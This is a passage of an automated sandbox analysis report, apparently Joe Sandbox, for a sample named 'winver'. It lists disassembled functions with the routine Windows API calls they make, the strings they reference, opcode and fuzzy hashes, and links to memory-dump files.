Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
String ID:
API String ID: 3142591903-0
Opcode ID: d5ecaf9038a5373d43593abb1084b45be3df1996aef22304e729a9aea4fd0e22
Instruction ID: f2883bdc128b22caf5ab14cf9d72b537c15ae10aee8839bc4e7725b537cb365d
Opcode Fuzzy Hash: d5ecaf9038a5373d43593abb1084b45be3df1996aef22304e729a9aea4fd0e22
Instruction Fuzzy Hash: 92011A36A18B5996EB50DF95E44026D7374FB88B90F144431DB8E83B54EF3DE49AC740

Function 00007FF63D791F8C Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

EndPath.GDI32 ref: 00007FF63D791FA8
StrokeAndFillPath.GDI32 ref: 00007FF63D791FC0
SelectObject.GDI32 ref: 00007FF63D791FD5
DeleteObject.GDI32 ref: 00007FF63D791FEA
StrokePath.GDI32 ref: 00007FF63D79200A

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 64bd2083a7021a658ce75012f56fe63c06ee7b8a50a77be3ea17721f6b51c81e
Instruction ID: 774ed4fb2e187dc76979bb1aff3ad20555ff188527d4255ac455074b804e1a1c
Opcode Fuzzy Hash: 64bd2083a7021a658ce75012f56fe63c06ee7b8a50a77be3ea17721f6b51c81e
Instruction Fuzzy Hash: 29011A3290C64F92FB949B91E9957343376AF45B94F184230D91D863A0EF7DB098A300

Function 00007FF63D7D0640 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7D08E4

Strings

ccs, xrefs: 00007FF63D7D0829
UTF-16LEUNICODE, xrefs: 00007FF63D7D088B
UTF-8, xrefs: 00007FF63D7D0868

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4cd5c8391be05e63ba2070ad9831383d51567e0a74711362431776f8f3547371
Instruction ID: 108ef95f43c29af55ff412e020d51b99f8318a3694232b8c9f8afa886a25706f
Opcode Fuzzy Hash: 4cd5c8391be05e63ba2070ad9831383d51567e0a74711362431776f8f3547371
Instruction Fuzzy Hash: E5818D72E0821A86FF644FA5964027926B0AF11754F28A035CA0EDB780FE6CF870FB51

Function 00007FF63D80B544 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00007FF63D80B5D5
DeleteMenu.USER32 ref: 00007FF63D80B621
DeleteMenu.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF63D80B66E

Strings

P, xrefs: 00007FF63D80B5AA

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: P
API String ID: 135850232-3110715001
Opcode ID: e75aebb7c41b7d720d31c93da711725fb17813754b6ee284f137d5c90d897e2c
Instruction ID: 94d1debefe7e774a650ea9ed3f3cc8e16abf9d02fc9f676b9cce6830c3660588
Opcode Fuzzy Hash: e75aebb7c41b7d720d31c93da711725fb17813754b6ee284f137d5c90d897e2c
Instruction Fuzzy Hash: 7041B222A09B8995FB21CB59D4443AD7760FB84BA8F568231DA7D873D1EF38F541D700

Function 00007FF63D7CF0A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000010,00000010,00000000,00000010,00007FF63D7CF505), ref: 00007FF63D7CF18E
WriteFile.KERNEL32 ref: 00007FF63D7CF1C1
GetLastError.KERNEL32 ref: 00007FF63D7CF1E3

Strings

U, xrefs: 00007FF63D7CF16C

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: d0b1e8677b384d2f7da546d67da8bfe7fbe0b6d39d22b2b3d02c14f1772fe3b9
Instruction ID: c02ca42d0eb577048f7a921f47351bb2fe257ca03cfec313b988caa6e4af9def
Opcode Fuzzy Hash: d0b1e8677b384d2f7da546d67da8bfe7fbe0b6d39d22b2b3d02c14f1772fe3b9
Instruction Fuzzy Hash: 1941A422B19A8586E7608FA5E8453BAA771FB88B94F444031EE4D87788EF3CE541D740

Function 00007FF63D7AE3D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF63D7AE3E7
GetProcAddress.KERNEL32 ref: 00007FF63D7AE3FF

Strings

Wow64RevertWow64FsRedirection, xrefs: 00007FF63D7AE3F5
kernel32.dll, xrefs: 00007FF63D7AE3E0

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 8abd1f46e5335977ce6c048307d1f64a07372ae152d9a92a645d3dc298bd1350
Instruction ID: bf4ddcc3c8882ac06dad902c9fb0cca54843380c7773729312e062661de6386b
Opcode Fuzzy Hash: 8abd1f46e5335977ce6c048307d1f64a07372ae152d9a92a645d3dc298bd1350
Instruction Fuzzy Hash: 5AE0ED62A15B0A81EF149B90E81937823B8FB48B54F440434DA1D86350FF7CE9A9D350

Function 00007FF63D7AE418 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00007FF63D7ADA08), ref: 00007FF63D7AE42F
GetProcAddress.KERNEL32(?,?,?,00007FF63D7ADA08), ref: 00007FF63D7AE447

Strings

kernel32.dll, xrefs: 00007FF63D7AE428
Wow64DisableWow64FsRedirection, xrefs: 00007FF63D7AE43D

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 8a87cee21396e4eb60be463363f34bd0a43d3f2b2e0e2d762bccbf779733e710
Instruction ID: ead7413c433235e4a57b28eb80a1bcdb1a226f342df99334a29e9319fcf0ffef
Opcode Fuzzy Hash: 8a87cee21396e4eb60be463363f34bd0a43d3f2b2e0e2d762bccbf779733e710
Instruction Fuzzy Hash: 85E0E525A16B0A82EF148BA0E8253B823B8FB08B58F440434DD1D86350FF7CEAA99350

Function 00007FF63D7FC5BC Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1986686e5b96601809c1b8b5614cff32ed54bb0dbbc9b55e85925a902c313c2e
Instruction ID: f96af4f80c8b117afb548870a98ce70b72cfabd0f9801089fa2af7c8517889c8
Opcode Fuzzy Hash: 1986686e5b96601809c1b8b5614cff32ed54bb0dbbc9b55e85925a902c313c2e
Instruction Fuzzy Hash: A3D1FA67B04B5A86EB24CF66C4802AD27B4FB48F98B114426EF4D87B58EF39E844D750

Function 00007FF63D828CD0 Relevance: 6.3, APIs: 4, Instructions: 282COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00007FF63D828D6A

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 4c46726cbdfff6d9c111305c5b24e1984e188ff4718f1fd1deafb3af6ce37ed9
Instruction ID: a320588c182a069a1272875e5eecffce01854418da8314ca7b55d0b34adadbe5
Opcode Fuzzy Hash: 4c46726cbdfff6d9c111305c5b24e1984e188ff4718f1fd1deafb3af6ce37ed9
Instruction Fuzzy Hash: DED13876B04B499AEB10EFA5D4801EC37B5FB54B88B404436DE0D97B99EF38E52AD340

Function 00007FF63D797020 Relevance: 6.2, APIs: 4, Instructions: 247fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00007FF63D7AD8CD,?,?,?,00007FF63D7966A3,?,?,?,?,?,?,?,00007FF63D797018), ref: 00007FF63D7971E4
SetFilePointerEx.KERNEL32(?,?,00007FF63D7AD8CD,?,?,?,00007FF63D7966A3,?,?,?,?,?,?,?,00007FF63D797018), ref: 00007FF63D7DCC86

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 16bdc3c66d303c3833ccba423dfae6aa08e9d5eb2b888db83c106332ffd28174
Instruction ID: 2641417320656f820bf2519eb75e1ab73e26c49b9e5e9a38701f669506de53f7
Opcode Fuzzy Hash: 16bdc3c66d303c3833ccba423dfae6aa08e9d5eb2b888db83c106332ffd28174
Instruction Fuzzy Hash: E0B1A372A08A4A86EA21CFA5E4547B967B4FF49B90F144635DB9E83790FF3DF041A700

Function 00007FF63D7D7678 Relevance: 6.2, APIs: 4, Instructions: 160COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7D76B9
_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7D7736
_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7D7787
_get_daylight.LIBCMT ref: 00007FF63D7D77E3

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: 5087c10905a1191165e047a2b228de8422a5e47e8feaa3a774343e2297d5a0e2
Instruction ID: 1347ce5881aaaebf533c07d42dc6e70110e0a4eac743bdc2fbcb5388ca48cce7
Opcode Fuzzy Hash: 5087c10905a1191165e047a2b228de8422a5e47e8feaa3a774343e2297d5a0e2
Instruction Fuzzy Hash: 3C51D132E0C25A86F7655AA8C5053F96AB0EF00724F198835DA0FC73D5FEADF840E691

Function 00007FF63D840428 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(00000000,?,?,?,?,00007FF63D841FDD), ref: 00007FF63D840468
GetWindowRect.USER32(?,?,?,?,00007FF63D841FDD), ref: 00007FF63D8404F7
PtInRect.USER32 ref: 00007FF63D840507
MessageBeep.USER32(?,?,?,?,00007FF63D841FDD), ref: 00007FF63D840579

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: bc9ae1282fa6102d4a75e36bbd9828f74e0f984f33a0a9854f5e51c7abe7aa27
Instruction ID: 35b23394c0b726b85c2763483521bbc3a61238c91a8f40b4bbaede2686a39fc3
Opcode Fuzzy Hash: bc9ae1282fa6102d4a75e36bbd9828f74e0f984f33a0a9854f5e51c7abe7aa27
Instruction Fuzzy Hash: 57415C32A08A5A85EB50CF99E44467A33A8FB84B94F564136DE5DD3360EF38F855E300

Function 00007FF63D83BE18 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00007FF63D83BF06
IsMenu.USER32 ref: 00007FF63D83BF24
InsertMenuItemW.USER32 ref: 00007FF63D83BF75
DrawMenuBar.USER32 ref: 00007FF63D83BF8A

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID:
API String ID: 3076010158-0
Opcode ID: 706a80ad7f905c125bd2fc2a44639b3e8d2d37d164d591964100fa01139b81b7
Instruction ID: fa54c24ebd0cfb14ad6f7cef25994a2167d1f433bed59ba06e40e618524b8def
Opcode Fuzzy Hash: 706a80ad7f905c125bd2fc2a44639b3e8d2d37d164d591964100fa01139b81b7
Instruction Fuzzy Hash: 80416B7AB04A898AEB20CFA6D8402AD37B4FB84B84F154036DE1D97754EF38F855DB40

Function 00007FF63D7CCD2C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7CCD7F
WideCharToMultiByte.KERNEL32 ref: 00007FF63D7CCE51
GetLastError.KERNEL32 ref: 00007FF63D7CCE74
_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7CCEA6

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: d2a345290b0037450dfa995526c6afbd0a3802143e442141ba024faddd95d0eb
Instruction ID: 4feb77564dd25ff0071b2a2d9ab56e19c82bd78ae508b09750e0c1ce926715ce
Opcode Fuzzy Hash: d2a345290b0037450dfa995526c6afbd0a3802143e442141ba024faddd95d0eb
Instruction Fuzzy Hash: 7C414F31E0874A4AFB659B9195403B9A6B0EF85F90F144135EA5987BD9FF3CF882A700

Function 00007FF63D8424A0 Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7926F4: GetWindowLongPtrW.USER32 ref: 00007FF63D792711

GetCursorPos.USER32 ref: 00007FF63D8424F5
TrackPopupMenuEx.USER32 ref: 00007FF63D842519
GetCursorPos.USER32(?,?,00000000,?,?,00007FF63D7DAA7A,?,?,?,?,?,?,?,?,?,00007FF63D79244F), ref: 00007FF63D842560
DefDlgProcW.USER32(?,?,00000000,?,?,00007FF63D7DAA7A,?,?,?,?,?,?,?,?,?,00007FF63D79244F), ref: 00007FF63D8425A4

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 05409b944b202e5d0f89ff35a7dbfaf1728f6532fcf37a1de83141762e166781
Instruction ID: 63269b32f15afdbc6a839d09ad7cb80508fac08250ad0fc66fff2dc6033d677c
Opcode Fuzzy Hash: 05409b944b202e5d0f89ff35a7dbfaf1728f6532fcf37a1de83141762e166781
Instruction Fuzzy Hash: 3931AF26A08A4A81EB60CB46E4553BD7374FB84FD8F144131DA4D83BA8EF7CE545D700

Function 00007FF63D7962DC Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00007FF63D79636C
GetStockObject.GDI32 ref: 00007FF63D796389
SendMessageW.USER32 ref: 00007FF63D79639C

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 8126d30d516bcbf8c6cff6b5a2b3d0fc6ad8df3606de3d9e900892a50264b5af
Instruction ID: c1020a64f720667d69f11a185dfdf8b878660cf091c4ba9b20aa2bdfb8e1a66e
Opcode Fuzzy Hash: 8126d30d516bcbf8c6cff6b5a2b3d0fc6ad8df3606de3d9e900892a50264b5af
Instruction Fuzzy Hash: BC213072A087C98AE7648F55E4547AEB7B0FB88784F544139DA8D83B54DF7CE484DB00

Function 00007FF63D843678 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7926F4: GetWindowLongPtrW.USER32 ref: 00007FF63D792711

GetClientRect.USER32(?,?,?,?,?,00007FF63D7DA980,?,?,?,?,?,?,?,?,?,00007FF63D79244F), ref: 00007FF63D8436D8
GetCursorPos.USER32(?,?,?,?,?,00007FF63D7DA980,?,?,?,?,?,?,?,?,?,00007FF63D79244F), ref: 00007FF63D8436E3
ScreenToClient.USER32 ref: 00007FF63D8436F1
DefDlgProcW.USER32(?,?,?,?,?,00007FF63D7DA980,?,?,?,?,?,?,?,?,?,00007FF63D79244F), ref: 00007FF63D843733

Part of subcall function 00007FF63D83FCA8: LoadCursorW.USER32 ref: 00007FF63D83FD59

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ClientCursor$LoadLongProcRectScreenWindow
String ID:
API String ID: 1626762757-0
Opcode ID: 31e346ab2185721bb870119e82032548828383da81e54f4de20c121afcc47a15
Instruction ID: cf68fcc4eb3eda24c1e1e9018b2422216543cd2bc03d0427ed21843798432e8f
Opcode Fuzzy Hash: 31e346ab2185721bb870119e82032548828383da81e54f4de20c121afcc47a15
Instruction Fuzzy Hash: 9D217F72A0874A92EB20DB45E44116973B4FB84F80F944131DA8D83B59EF3CF945DB00

Function 00007FF63D7CBD78 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF63D7B93D0,?,?,0x%p,00007FF63D7BDEED), ref: 00007FF63D7CBD82
SetLastError.KERNEL32(?,?,?,00007FF63D7B93D0,?,?,0x%p,00007FF63D7BDEED), ref: 00007FF63D7CBDEA
SetLastError.KERNEL32(?,?,?,00007FF63D7B93D0,?,?,0x%p,00007FF63D7BDEED), ref: 00007FF63D7CBE00
abort.LIBCMT ref: 00007FF63D7CBE06

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
